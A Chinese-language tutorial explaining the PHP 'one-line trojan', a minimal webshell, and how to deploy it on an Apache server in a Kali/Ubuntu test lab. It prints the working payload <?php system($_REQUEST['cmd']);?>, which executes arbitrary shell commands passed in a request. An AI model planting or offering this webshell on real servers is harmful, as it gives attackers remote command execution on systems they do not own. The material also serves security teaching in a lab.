什么是一句话木马?

简单来说一句话木马就是通过向服务端提交一句简短的代码来达到向服务器插入木马并最终获得webshell的方法。对于不同的语言有不同的构造方法，基本构造是首先出现的是脚本开始的标记，后边跟着的 eval 或者是 execute 是核心部分，就是获取并执行后边得到的内容，而后边得到的内容，是 request 或者是 $ POST 获取的值。如果我们通过客户端向服务器发送，那么就会让服务器执行我们发送的脚本，挂马就实现了。

这里我们测试利用的一句话木马为：
<?php system($_REQUEST['cmd']);?>

准备工作

测试环境

Kali-Linux2 ：一句话木马的部署

ubuntu16.04：攻击机，对靶机进行访问l利用

一句话木马的部署

1、在目录/var/www/html 下新建一个php文件，文件内容为上一句话木马。

2、使用 service apache2 start 开启阿帕奇服务

3、查看开启的服务
开启服务
扩展：什么是apache?

Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上，由于其跨平台和安全性被广泛使用，是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充，将Perl/Python等解释器编译到服务器中。
在Kali-Linux2中，apache服务的默认存储位置为/var/www/html/,即输入URL时不需要输入这个地址